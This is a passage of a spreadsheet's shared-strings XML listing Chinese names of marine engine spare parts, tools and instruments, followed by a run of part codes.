    <t xml:space="preserve">液压拉伸器备件                                           </t>
  </si>
  <si>
    <t xml:space="preserve">夹箍（整体）                                            </t>
  </si>
  <si>
    <t xml:space="preserve">带锁夹箍                                              </t>
  </si>
  <si>
    <t xml:space="preserve">铆钉                                                </t>
  </si>
  <si>
    <t xml:space="preserve">吊钩                                                </t>
  </si>
  <si>
    <t xml:space="preserve">闭合设备                                              </t>
  </si>
  <si>
    <t xml:space="preserve">门扣                                                </t>
  </si>
  <si>
    <t xml:space="preserve">门闩                                                </t>
  </si>
  <si>
    <t xml:space="preserve">带底座的径向滚球轴承                                        </t>
  </si>
  <si>
    <t xml:space="preserve">径向带底座的滚柱轴承                                        </t>
  </si>
  <si>
    <t xml:space="preserve">径向带底座的滚针轴承                                        </t>
  </si>
  <si>
    <t xml:space="preserve">有滚筒的滚针轴承                                          </t>
  </si>
  <si>
    <t xml:space="preserve">径向带法兰轴承                                           </t>
  </si>
  <si>
    <t xml:space="preserve">径向球轴承                                             </t>
  </si>
  <si>
    <t xml:space="preserve">径向滚柱轴承                                            </t>
  </si>
  <si>
    <t xml:space="preserve">径向滚针轴承                                            </t>
  </si>
  <si>
    <t xml:space="preserve">带底座的轴向滚球轴承                                        </t>
  </si>
  <si>
    <t xml:space="preserve">轴向带底座的滚柱轴承                                        </t>
  </si>
  <si>
    <t xml:space="preserve">轴向带底座的滚针轴承                                        </t>
  </si>
  <si>
    <t xml:space="preserve">轴向带法兰轴承                                           </t>
  </si>
  <si>
    <t xml:space="preserve">轴向球轴承                                             </t>
  </si>
  <si>
    <t xml:space="preserve">轴向滚柱轴承                                            </t>
  </si>
  <si>
    <t xml:space="preserve">轴向滚针轴承                                            </t>
  </si>
  <si>
    <t xml:space="preserve">曲线滚筒                                              </t>
  </si>
  <si>
    <t xml:space="preserve">活塞和活塞环                                            </t>
  </si>
  <si>
    <t xml:space="preserve">橡胶支撑                                              </t>
  </si>
  <si>
    <t xml:space="preserve">支撑底座                                              </t>
  </si>
  <si>
    <t xml:space="preserve">工作台                                               </t>
  </si>
  <si>
    <t xml:space="preserve">支架（工作台用）                                          </t>
  </si>
  <si>
    <t xml:space="preserve">信号箱支架                                             </t>
  </si>
  <si>
    <t xml:space="preserve">计算机支架                                             </t>
  </si>
  <si>
    <t xml:space="preserve">有把手的圆盖                                            </t>
  </si>
  <si>
    <t xml:space="preserve">有把手的方盖                                            </t>
  </si>
  <si>
    <t xml:space="preserve">有把手的椭圆盖                                           </t>
  </si>
  <si>
    <t xml:space="preserve">橡胶防护装置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">金属刮油环                                             </t>
  </si>
  <si>
    <t xml:space="preserve">轴向刮油环                                             </t>
  </si>
  <si>
    <t xml:space="preserve">钢+铸铁密封环                                           </t>
  </si>
  <si>
    <t xml:space="preserve">带支撑的kant密封                                        </t>
  </si>
  <si>
    <t xml:space="preserve">带挡圈的密封环                                           </t>
  </si>
  <si>
    <t xml:space="preserve">橡胶包裹密封环                                           </t>
  </si>
  <si>
    <t xml:space="preserve">座套                                                </t>
  </si>
  <si>
    <t xml:space="preserve">清洗罐                                               </t>
  </si>
  <si>
    <t xml:space="preserve">带液位开关的泄放盒                                         </t>
  </si>
  <si>
    <t xml:space="preserve">压力箱                                               </t>
  </si>
  <si>
    <t xml:space="preserve">圆柱形容器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">容器盘                                               </t>
  </si>
  <si>
    <t xml:space="preserve">箱                                                 </t>
  </si>
  <si>
    <t xml:space="preserve">带安装板电气箱                                           </t>
  </si>
  <si>
    <t xml:space="preserve">木箱附件                                              </t>
  </si>
  <si>
    <t xml:space="preserve">信号箱安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">闩                                                 </t>
  </si>
  <si>
    <t xml:space="preserve">外来图纸                                              </t>
  </si>
  <si>
    <t xml:space="preserve">圆形绝缘垫                                             </t>
  </si>
  <si>
    <t xml:space="preserve">绝缘垫                                               </t>
  </si>
  <si>
    <t xml:space="preserve">钢管套接焊接                                            </t>
  </si>
  <si>
    <t xml:space="preserve">接头螺母                                              </t>
  </si>
  <si>
    <t xml:space="preserve">公单向阀                                              </t>
  </si>
  <si>
    <t xml:space="preserve">长度可调接头                                            </t>
  </si>
  <si>
    <t xml:space="preserve">可调直通公接头                                           </t>
  </si>
  <si>
    <t xml:space="preserve">缩径管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">限定可调弯接头                                           </t>
  </si>
  <si>
    <t xml:space="preserve">带限位的直接头                                           </t>
  </si>
  <si>
    <t xml:space="preserve">法兰护套                                              </t>
  </si>
  <si>
    <t xml:space="preserve">球阀备件                                              </t>
  </si>
  <si>
    <t xml:space="preserve">孔座                                                </t>
  </si>
  <si>
    <t xml:space="preserve">流量开关安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">自动面板                                              </t>
  </si>
  <si>
    <t xml:space="preserve">指示仪表                                              </t>
  </si>
  <si>
    <t xml:space="preserve">下垂式控制                                             </t>
  </si>
  <si>
    <t xml:space="preserve">启动和喷射辅助箱                                          </t>
  </si>
  <si>
    <t xml:space="preserve">接点排                                               </t>
  </si>
  <si>
    <t xml:space="preserve">电缆绑带支架                                            </t>
  </si>
  <si>
    <t xml:space="preserve">三通有把管钳                                            </t>
  </si>
  <si>
    <t xml:space="preserve">开槽螺母管钳                                            </t>
  </si>
  <si>
    <t xml:space="preserve">六角槽T形手柄                                           </t>
  </si>
  <si>
    <t xml:space="preserve">特殊销扳手                                             </t>
  </si>
  <si>
    <t xml:space="preserve">可调开口扳手                                            </t>
  </si>
  <si>
    <t xml:space="preserve">环行扳手                                              </t>
  </si>
  <si>
    <t xml:space="preserve">棘轮扳手                                              </t>
  </si>
  <si>
    <t xml:space="preserve">扭矩扳手                                              </t>
  </si>
  <si>
    <t xml:space="preserve">正方形通用接头                                           </t>
  </si>
  <si>
    <t xml:space="preserve">弯把手                                               </t>
  </si>
  <si>
    <t xml:space="preserve">偏移扳手                                              </t>
  </si>
  <si>
    <t xml:space="preserve">管钳套装                                              </t>
  </si>
  <si>
    <t xml:space="preserve">吊环螺栓架                                             </t>
  </si>
  <si>
    <t xml:space="preserve">链条折卸工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">链条装配工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">螺钉夹具                                              </t>
  </si>
  <si>
    <t xml:space="preserve">螺柱定位器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">液压拉伸拔出工具                                          </t>
  </si>
  <si>
    <t xml:space="preserve">弹簧安装锥                                             </t>
  </si>
  <si>
    <t xml:space="preserve">部件                                                </t>
  </si>
  <si>
    <t xml:space="preserve">液压拉伸器(承压圈)                                        </t>
  </si>
  <si>
    <t xml:space="preserve">液压拉伸器工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">液压拉伸器，不带泵                                         </t>
  </si>
  <si>
    <t xml:space="preserve">液压拉什器（带泵）                                         </t>
  </si>
  <si>
    <t xml:space="preserve">液压拉伸器（配件)                                         </t>
  </si>
  <si>
    <t xml:space="preserve">机械拉伸器（螺纹）                                         </t>
  </si>
  <si>
    <t xml:space="preserve">机械拉伸器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">起重杆                                               </t>
  </si>
  <si>
    <t xml:space="preserve">内锥套                                               </t>
  </si>
  <si>
    <t xml:space="preserve">外锥套                                               </t>
  </si>
  <si>
    <t xml:space="preserve">内外锥套                                              </t>
  </si>
  <si>
    <t xml:space="preserve">凹孔导套                                              </t>
  </si>
  <si>
    <t xml:space="preserve">中间帽                                               </t>
  </si>
  <si>
    <t xml:space="preserve">锥形定位销                                             </t>
  </si>
  <si>
    <t xml:space="preserve">法兰定位销                                             </t>
  </si>
  <si>
    <t xml:space="preserve">销钳                                                </t>
  </si>
  <si>
    <t xml:space="preserve">滑块导向工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">滑车                                                </t>
  </si>
  <si>
    <t xml:space="preserve">钢丝滑车                                              </t>
  </si>
  <si>
    <t xml:space="preserve">链条滑车                                              </t>
  </si>
  <si>
    <t xml:space="preserve">手拉葫芦                                              </t>
  </si>
  <si>
    <t xml:space="preserve">铁钩                                                </t>
  </si>
  <si>
    <t xml:space="preserve">梁爪                                                </t>
  </si>
  <si>
    <t xml:space="preserve">带螺柱夹箍                                             </t>
  </si>
  <si>
    <t xml:space="preserve">起吊小车                                              </t>
  </si>
  <si>
    <t xml:space="preserve">带刹车的移动推车                                          </t>
  </si>
  <si>
    <t xml:space="preserve">防擦材料                                              </t>
  </si>
  <si>
    <t xml:space="preserve">4轮小车                                              </t>
  </si>
  <si>
    <t xml:space="preserve">2轮小车                                              </t>
  </si>
  <si>
    <t xml:space="preserve">小车部件                                              </t>
  </si>
  <si>
    <t xml:space="preserve">倾斜工具支柱                                            </t>
  </si>
  <si>
    <t xml:space="preserve">起吊攀                                               </t>
  </si>
  <si>
    <t xml:space="preserve">起吊盖                                               </t>
  </si>
  <si>
    <t xml:space="preserve">滑轮装置                                              </t>
  </si>
  <si>
    <t xml:space="preserve">平衡环总成                                             </t>
  </si>
  <si>
    <t xml:space="preserve">工作平台                                              </t>
  </si>
  <si>
    <t xml:space="preserve">平台支撑                                              </t>
  </si>
  <si>
    <t xml:space="preserve">液压马达提伸工具                                          </t>
  </si>
  <si>
    <t xml:space="preserve">填料函环                                              </t>
  </si>
  <si>
    <t xml:space="preserve">端铣刀具                                              </t>
  </si>
  <si>
    <t xml:space="preserve">特殊切割机                                             </t>
  </si>
  <si>
    <t xml:space="preserve">剪刀                                                </t>
  </si>
  <si>
    <t xml:space="preserve">研磨棒                                               </t>
  </si>
  <si>
    <t xml:space="preserve">表面磨床                                              </t>
  </si>
  <si>
    <t xml:space="preserve">锥形磨床                                              </t>
  </si>
  <si>
    <t xml:space="preserve">铲形钻杆                                              </t>
  </si>
  <si>
    <t xml:space="preserve">铲形钻头                                              </t>
  </si>
  <si>
    <t xml:space="preserve">液压外孔                                              </t>
  </si>
  <si>
    <t xml:space="preserve">带芯盘车工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">带芯钻杆                                              </t>
  </si>
  <si>
    <t xml:space="preserve">钻床液压单元                                            </t>
  </si>
  <si>
    <t xml:space="preserve">刮板                                                </t>
  </si>
  <si>
    <t xml:space="preserve">清洁钻                                               </t>
  </si>
  <si>
    <t xml:space="preserve">清洁刷                                               </t>
  </si>
  <si>
    <t xml:space="preserve">测量检查工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">示功纸                                               </t>
  </si>
  <si>
    <t xml:space="preserve">测功器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">指针表                                               </t>
  </si>
  <si>
    <t xml:space="preserve">千分头                                               </t>
  </si>
  <si>
    <t xml:space="preserve">指针表支座                                             </t>
  </si>
  <si>
    <t xml:space="preserve">平面仪                                               </t>
  </si>
  <si>
    <t xml:space="preserve">可调销规                                              </t>
  </si>
  <si>
    <t xml:space="preserve">直销规                                               </t>
  </si>
  <si>
    <t xml:space="preserve">销规扩展                                              </t>
  </si>
  <si>
    <t xml:space="preserve">游标卡尺                                              </t>
  </si>
  <si>
    <t xml:space="preserve">测试心轴                                              </t>
  </si>
  <si>
    <t xml:space="preserve">测试心轴公差                                            </t>
  </si>
  <si>
    <t xml:space="preserve">测试设备                                              </t>
  </si>
  <si>
    <t xml:space="preserve">测量杆                                               </t>
  </si>
  <si>
    <t xml:space="preserve">拧紧规                                               </t>
  </si>
  <si>
    <t xml:space="preserve">塞尺调整                                              </t>
  </si>
  <si>
    <t xml:space="preserve">镜子                                                </t>
  </si>
  <si>
    <t xml:space="preserve">短直管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">带1个法兰的钢软管                                         </t>
  </si>
  <si>
    <t xml:space="preserve">带2个法兰的钢软管                                         </t>
  </si>
  <si>
    <t xml:space="preserve">带1个管子的钢软管                                         </t>
  </si>
  <si>
    <t xml:space="preserve">带2个管子的钢软管                                         </t>
  </si>
  <si>
    <t xml:space="preserve">带1个接头的钢软管                                         </t>
  </si>
  <si>
    <t xml:space="preserve">带2个接头的钢软管                                         </t>
  </si>
  <si>
    <t xml:space="preserve">带2个连轴节的软管                                         </t>
  </si>
  <si>
    <t xml:space="preserve">带1个连轴节的软管                                         </t>
  </si>
  <si>
    <t xml:space="preserve">软管组件                                              </t>
  </si>
  <si>
    <t xml:space="preserve">带螺纹/法兰的直管                                         </t>
  </si>
  <si>
    <t xml:space="preserve">带1个法兰的直管                                          </t>
  </si>
  <si>
    <t xml:space="preserve">带2个法兰的直管                                          </t>
  </si>
  <si>
    <t xml:space="preserve">带螺纹/法兰的弯管                                         </t>
  </si>
  <si>
    <t xml:space="preserve">带2个法兰的弯管                                          </t>
  </si>
  <si>
    <t xml:space="preserve">带接头的弯管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">非钢弯管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">带接头的非钢弯管                                          </t>
  </si>
  <si>
    <t xml:space="preserve">异径管接头+插孔                                          </t>
  </si>
  <si>
    <t xml:space="preserve">带法兰的橡胶弯头                                          </t>
  </si>
  <si>
    <t xml:space="preserve">焊接                                                </t>
  </si>
  <si>
    <t xml:space="preserve">带普通管的漏斗                                           </t>
  </si>
  <si>
    <t xml:space="preserve">带螺纹小孔的漏斗                                          </t>
  </si>
  <si>
    <t xml:space="preserve">带螺纹插孔的漏斗                                          </t>
  </si>
  <si>
    <t xml:space="preserve">不带管件的漏斗                                           </t>
  </si>
  <si>
    <t xml:space="preserve">带法兰的漏斗                                            </t>
  </si>
  <si>
    <t xml:space="preserve">普通圆法兰                                             </t>
  </si>
  <si>
    <t xml:space="preserve">特殊圆垫圈                                             </t>
  </si>
  <si>
    <t xml:space="preserve">矩形衬垫                                              </t>
  </si>
  <si>
    <t xml:space="preserve">可挥发有机成分小管                                         </t>
  </si>
  <si>
    <t xml:space="preserve">带公制螺纹的接头                                          </t>
  </si>
  <si>
    <t xml:space="preserve">公/母异径接头                                           </t>
  </si>
  <si>
    <t xml:space="preserve">公/公异径接头                                           </t>
  </si>
  <si>
    <t xml:space="preserve">母/母异径接头                                           </t>
  </si>
  <si>
    <t xml:space="preserve">接头插销                                              </t>
  </si>
  <si>
    <t xml:space="preserve">交叉螺纹连接                                            </t>
  </si>
  <si>
    <t xml:space="preserve">丝堵                                                </t>
  </si>
  <si>
    <t xml:space="preserve">弯管接头                                              </t>
  </si>
  <si>
    <t xml:space="preserve">T形接头                                              </t>
  </si>
  <si>
    <t xml:space="preserve">母快速接头                                             </t>
  </si>
  <si>
    <t xml:space="preserve">保护塞                                               </t>
  </si>
  <si>
    <t xml:space="preserve">快速接头保护帽                                           </t>
  </si>
  <si>
    <t xml:space="preserve">膨胀器丝堵                                             </t>
  </si>
  <si>
    <t xml:space="preserve">气体补偿器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">液体补偿器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">矩形补偿器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">油滤器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">放油管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">分离器芯                                              </t>
  </si>
  <si>
    <t xml:space="preserve">管式热交换器                                            </t>
  </si>
  <si>
    <t xml:space="preserve">板式热交换器                                            </t>
  </si>
  <si>
    <t xml:space="preserve">30度弯管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">锥阀                                                </t>
  </si>
  <si>
    <t xml:space="preserve">角度锥阀                                              </t>
  </si>
  <si>
    <t xml:space="preserve">带执行器的阀                                            </t>
  </si>
  <si>
    <t xml:space="preserve">角阀                                                </t>
  </si>
  <si>
    <t xml:space="preserve">蝶阀壳体                                              </t>
  </si>
  <si>
    <t xml:space="preserve">蝶阀阀瓣                                              </t>
  </si>
  <si>
    <t xml:space="preserve">两位三通电磁阀                                           </t>
  </si>
  <si>
    <t xml:space="preserve">2位4通电磁阀                                           </t>
  </si>
  <si>
    <t>ELFI/ELVA CONTROL VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">两位三通气动阀                                           </t>
  </si>
  <si>
    <t xml:space="preserve">2位4通气动阀                                           </t>
  </si>
  <si>
    <t xml:space="preserve">两位三通手动阀                                           </t>
  </si>
  <si>
    <t xml:space="preserve">2位4通手动阀                                           </t>
  </si>
  <si>
    <t xml:space="preserve">2位5通手动阀                                           </t>
  </si>
  <si>
    <t xml:space="preserve">2位5通阀                                             </t>
  </si>
  <si>
    <t xml:space="preserve">熔断阀                                               </t>
  </si>
  <si>
    <t xml:space="preserve">浮球阀                                               </t>
  </si>
  <si>
    <t xml:space="preserve">空气/水排泄阀                                           </t>
  </si>
  <si>
    <t xml:space="preserve">直锥阀                                               </t>
  </si>
  <si>
    <t xml:space="preserve">直阀                                                </t>
  </si>
  <si>
    <t xml:space="preserve">方向阀                                               </t>
  </si>
  <si>
    <t xml:space="preserve">填充和测试阀                                            </t>
  </si>
  <si>
    <t xml:space="preserve">带直丝堵的考克                                           </t>
  </si>
  <si>
    <t xml:space="preserve">带弯丝堵的考克                                           </t>
  </si>
  <si>
    <t xml:space="preserve">三通考克                                              </t>
  </si>
  <si>
    <t xml:space="preserve">法兰连接球阀                                            </t>
  </si>
  <si>
    <t xml:space="preserve">焊接连接球阀                                            </t>
  </si>
  <si>
    <t xml:space="preserve">支管球阀安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">双向滤器阀                                             </t>
  </si>
  <si>
    <t xml:space="preserve">滤器阀                                               </t>
  </si>
  <si>
    <t xml:space="preserve">滤器阀控制盖                                            </t>
  </si>
  <si>
    <t xml:space="preserve">控制盖+控制器                                           </t>
  </si>
  <si>
    <t xml:space="preserve">普通喷嘴                                              </t>
  </si>
  <si>
    <t xml:space="preserve">调整阀                                               </t>
  </si>
  <si>
    <t xml:space="preserve">高压泵                                               </t>
  </si>
  <si>
    <t xml:space="preserve">手动液压泵                                             </t>
  </si>
  <si>
    <t xml:space="preserve">螺旋齿轮泵                                             </t>
  </si>
  <si>
    <t xml:space="preserve">齿轮泵                                               </t>
  </si>
  <si>
    <t xml:space="preserve">活塞泵                                               </t>
  </si>
  <si>
    <t xml:space="preserve">离心泵                                               </t>
  </si>
  <si>
    <t xml:space="preserve">带执行器增压泵                                           </t>
  </si>
  <si>
    <t xml:space="preserve">注油抢                                               </t>
  </si>
  <si>
    <t xml:space="preserve">活塞杆空气缸                                            </t>
  </si>
  <si>
    <t xml:space="preserve">修理工具箱                                             </t>
  </si>
  <si>
    <t xml:space="preserve">薄膜蓄压器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">油芯注油器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">增压蓄压器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">压力变换器活塞                                           </t>
  </si>
  <si>
    <t xml:space="preserve">均化器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">压力表支架                                             </t>
  </si>
  <si>
    <t xml:space="preserve">U形管压力表                                            </t>
  </si>
  <si>
    <t xml:space="preserve">压力表壳                                              </t>
  </si>
  <si>
    <t xml:space="preserve">压力表刻度                                             </t>
  </si>
  <si>
    <t xml:space="preserve">压力表详细资料                                           </t>
  </si>
  <si>
    <t xml:space="preserve">温度计和温度传感器                                         </t>
  </si>
  <si>
    <t xml:space="preserve">直温度计                                              </t>
  </si>
  <si>
    <t xml:space="preserve">带护套的温度计                                           </t>
  </si>
  <si>
    <t xml:space="preserve">温度计保护套                                            </t>
  </si>
  <si>
    <t xml:space="preserve">直角温度计                                             </t>
  </si>
  <si>
    <t xml:space="preserve">缓冲管接头                                             </t>
  </si>
  <si>
    <t xml:space="preserve">盘式温度计                                             </t>
  </si>
  <si>
    <t xml:space="preserve">气压计                                               </t>
  </si>
  <si>
    <t xml:space="preserve">热粘度计外壳                                            </t>
  </si>
  <si>
    <t xml:space="preserve">流量调节器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">燃油供应单元                                            </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴润滑单元                                           </t>
  </si>
  <si>
    <t xml:space="preserve">填料函供油单元                                           </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器清洗单元                                           </t>
  </si>
  <si>
    <t xml:space="preserve">钟                                                 </t>
  </si>
  <si>
    <t xml:space="preserve">水表                                                </t>
  </si>
  <si>
    <t xml:space="preserve">水平仪                                               </t>
  </si>
  <si>
    <t xml:space="preserve">使用说明牌                                             </t>
  </si>
  <si>
    <t xml:space="preserve">带齿轮的交流电马达                                         </t>
  </si>
  <si>
    <t xml:space="preserve">带法兰的交流电马达                                         </t>
  </si>
  <si>
    <t xml:space="preserve">带底座的交流电马达                                         </t>
  </si>
  <si>
    <t xml:space="preserve">变压器和整流器                                           </t>
  </si>
  <si>
    <t xml:space="preserve">电压力表                                              </t>
  </si>
  <si>
    <t xml:space="preserve">电子压力仪表                                            </t>
  </si>
  <si>
    <t xml:space="preserve">压力监控单元                                            </t>
  </si>
  <si>
    <t xml:space="preserve">电子温度仪表                                            </t>
  </si>
  <si>
    <t xml:space="preserve">电子设备-电压                                           </t>
  </si>
  <si>
    <t xml:space="preserve">转数表                                               </t>
  </si>
  <si>
    <t xml:space="preserve">传感器箱                                              </t>
  </si>
  <si>
    <t xml:space="preserve">PMI控制箱                                            </t>
  </si>
  <si>
    <t xml:space="preserve">角度编码器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">场频                                                </t>
  </si>
  <si>
    <t xml:space="preserve">THOMPSON适配器                                       </t>
  </si>
  <si>
    <t xml:space="preserve">同步箱                                               </t>
  </si>
  <si>
    <t xml:space="preserve">传感器部件                                             </t>
  </si>
  <si>
    <t xml:space="preserve">同步传感器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">振动监控                                              </t>
  </si>
  <si>
    <t xml:space="preserve">振动报警                                              </t>
  </si>
  <si>
    <t xml:space="preserve">感应传感器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">流量控制量罩                                            </t>
  </si>
  <si>
    <t xml:space="preserve">电子流量仪                                             </t>
  </si>
  <si>
    <t xml:space="preserve">电子接近仪/探头                                          </t>
  </si>
  <si>
    <t xml:space="preserve">半导体                                               </t>
  </si>
  <si>
    <t xml:space="preserve">单元                                                </t>
  </si>
  <si>
    <t xml:space="preserve">多用途控制器                                            </t>
  </si>
  <si>
    <t xml:space="preserve">ALPHA公用单元                                         </t>
  </si>
  <si>
    <t xml:space="preserve">HMI面板                                             </t>
  </si>
  <si>
    <t xml:space="preserve">注油器控制单元                                           </t>
  </si>
  <si>
    <t xml:space="preserve">转发器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">电脑硬件                                              </t>
  </si>
  <si>
    <t xml:space="preserve">轴向振动监测器                                           </t>
  </si>
  <si>
    <t xml:space="preserve">绝缘导线                                              </t>
  </si>
  <si>
    <t xml:space="preserve">电缆安装指导                                            </t>
  </si>
  <si>
    <t xml:space="preserve">可熔插头                                              </t>
  </si>
  <si>
    <t xml:space="preserve">重载接头                                              </t>
  </si>
  <si>
    <t xml:space="preserve">多功能插头                                             </t>
  </si>
  <si>
    <t xml:space="preserve">PCB插头                                             </t>
  </si>
  <si>
    <t xml:space="preserve">PCB插头套件                                           </t>
  </si>
  <si>
    <t xml:space="preserve">电子先导单元                                            </t>
  </si>
  <si>
    <t xml:space="preserve">电子控制单元                                            </t>
  </si>
  <si>
    <t xml:space="preserve">机械控制单元                                            </t>
  </si>
  <si>
    <t xml:space="preserve">压力开关                                              </t>
  </si>
  <si>
    <t xml:space="preserve">气动控制单元                                            </t>
  </si>
  <si>
    <t xml:space="preserve">位置传器器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">自动调压器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">温度监控                                              </t>
  </si>
  <si>
    <t xml:space="preserve">灯具                                                </t>
  </si>
  <si>
    <t xml:space="preserve">荧光管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">荧光照明设备                                            </t>
  </si>
  <si>
    <t xml:space="preserve">照明装置                                              </t>
  </si>
  <si>
    <t xml:space="preserve">探头灯                                               </t>
  </si>
  <si>
    <t xml:space="preserve">开关                                                </t>
  </si>
  <si>
    <t xml:space="preserve">开关部件                                              </t>
  </si>
  <si>
    <t xml:space="preserve">箱子                                                </t>
  </si>
  <si>
    <t xml:space="preserve">接线排                                               </t>
  </si>
  <si>
    <t xml:space="preserve">空附件                                               </t>
  </si>
  <si>
    <t xml:space="preserve">接线箱附件                                             </t>
  </si>
  <si>
    <t xml:space="preserve">多功能插座                                             </t>
  </si>
  <si>
    <t xml:space="preserve">电预热器                                              </t>
  </si>
  <si>
    <t xml:space="preserve">操纵台照明灯                                            </t>
  </si>
  <si>
    <t xml:space="preserve">淡水分配管支撑                                           </t>
  </si>
  <si>
    <t>6A0001</t>
  </si>
  <si>
    <t>6A0011</t>
  </si>
  <si>
    <t>6A0022</t>
  </si>
  <si>
    <t>6A0110</t>
  </si>
  <si>
    <t>6A0120</t>
  </si>
  <si>
    <t>6A0200</t>
  </si>
  <si>
    <t>6A0210</t>
  </si>
  <si>
    <t>6A0225</t>
  </si>
  <si>
    <t>6A0290</t>
  </si>
  <si>
    <t>6A0294</t>
  </si>
  <si>
    <t>6A0401</t>
  </si>
  <si>
    <t>6A1000</t>
  </si>
  <si>
    <t>6A1001</t>
  </si>
  <si>
    <t>6A1030</t>
  </si>
  <si>
    <t>6A1100</t>
  </si>
  <si>
    <t>6A1110</t>
  </si>
  <si>
    <t>6A1120</t>
  </si>
  <si>
    <t>6A1121</t>
  </si>
  <si>
    <t>6A1122</t>
  </si>
  <si>
    <t>6A1123</t>
  </si>
  <si>
    <t>6A1129</t>
  </si>
  <si>
    <t>6A1130</t>
  </si>
  <si>
    <t>6A1200</t>
  </si>
  <si>
    <t>6A1201</t>
  </si>
  <si>
    <t>6A2010</t>
  </si>
  <si>
    <t>6A2101</t>
  </si>
  <si>
    <t>6A2103</t>
  </si>
  <si>
    <t>6A2104</t>
  </si>
  <si>
    <t>6A2107</t>
  </si>
  <si>
    <t>6A2202</t>
  </si>
  <si>
    <t>6A2206</t>
  </si>
  <si>
    <t>6A2252</t>
  </si>
  <si>
    <t>6A2257</t>
  </si>
  <si>
    <t>6A2306</t>
  </si>
  <si>
    <t>6A2307</t>
  </si>
  <si>
    <t>6A3003</t>
  </si>
  <si>
    <t>6A3009</t>
  </si>
  <si>
    <t>6A3060</t>
  </si>
  <si>
    <t>6A3063</t>
  </si>
  <si>
    <t xml:space="preserve">控制箱联动轴                                            </t>
  </si>
  <si>
    <t>6A3070</t>
  </si>
  <si>
    <t>6A3089</t>
  </si>
  <si>
    <t>6A3091</t>
  </si>
  <si>
    <t xml:space="preserve">仪表尺寸图                                             </t>
  </si>
  <si>
    <t>6A3109</t>
  </si>
  <si>
    <t>6A3204</t>
  </si>
  <si>
    <t>6A3205</t>
  </si>
  <si>
    <t>6A3209</t>
  </si>
  <si>
    <t>6A3211</t>
  </si>
  <si>
    <t>6A3220</t>
  </si>
  <si>
    <t>6A3221</t>
  </si>
  <si>
    <t>6A3254</t>
  </si>
  <si>
    <t>6A3255</t>
  </si>
  <si>
    <t>6A3256</t>
  </si>
  <si>
    <t>6A3260</t>
  </si>
  <si>
    <t>6A3261</t>
  </si>
  <si>
    <t>6A3280</t>
  </si>
  <si>
    <t>6A4001</t>
  </si>
  <si>
    <t>6A4004</t>
  </si>
  <si>
    <t>6A4005</t>
  </si>
  <si>
    <t>6A4006</t>
  </si>
  <si>
    <t>6A4009</t>
  </si>
  <si>
    <t>6A4020</t>
  </si>
  <si>
    <t>6A4021</t>
  </si>
  <si>
    <t>6A4061</t>
  </si>
  <si>
    <t>6A4062</t>
  </si>
  <si>
    <t>6A4101</t>
  </si>
  <si>
    <t>6A4102</t>
  </si>
  <si>
    <t>6A4103</t>
  </si>
  <si>
    <t>6A4182</t>
  </si>
  <si>
    <t xml:space="preserve">电动/气动转换                                           </t>
  </si>
  <si>
    <t>6A4201</t>
  </si>
  <si>
    <t xml:space="preserve">带孔圆柱销钉                                            </t>
  </si>
  <si>
    <t xml:space="preserve">加锁扣链节                                             </t>
  </si>
  <si>
    <t xml:space="preserve">起重链环                                              </t>
  </si>
  <si>
    <t xml:space="preserve">六角头螺丝                                             </t>
  </si>
  <si>
    <t xml:space="preserve">圆柱头螺钉                                             </t>
  </si>
  <si>
    <t xml:space="preserve">特殊螺纹公差                                            </t>
  </si>
  <si>
    <t xml:space="preserve">支撑角度板                                             </t>
  </si>
  <si>
    <t xml:space="preserve">带液位开关泄放盒                                          </t>
  </si>
  <si>
    <t xml:space="preserve">拧紧/拆卸螺母                                           </t>
  </si>
  <si>
    <t xml:space="preserve">紧配螺柱和螺栓                                           </t>
  </si>
  <si>
    <t xml:space="preserve">密封剂-硅树脂粘接剂                                        </t>
  </si>
  <si>
    <t xml:space="preserve">螺柱安全设施                                            </t>
  </si>
  <si>
    <t xml:space="preserve">锁紧钢丝的安装                                           </t>
  </si>
  <si>
    <t xml:space="preserve">管件基本符号                                            </t>
  </si>
  <si>
    <t xml:space="preserve">设备符号说明                                            </t>
  </si>
  <si>
    <t xml:space="preserve">粘合剂，硅橡胶                                           </t>
  </si>
  <si>
    <t xml:space="preserve">金属粘合剂                                             </t>
  </si>
  <si>
    <t xml:space="preserve">不清楚的图纸                                            </t>
  </si>
  <si>
    <t xml:space="preserve">曲轴采购规格                                            </t>
  </si>
  <si>
    <t xml:space="preserve">不锈钢丝网                                             </t>
  </si>
  <si>
    <t xml:space="preserve">扩管                                                </t>
  </si>
  <si>
    <t xml:space="preserve">管接头部件                                             </t>
  </si>
  <si>
    <t xml:space="preserve">外螺纹三通接头                                           </t>
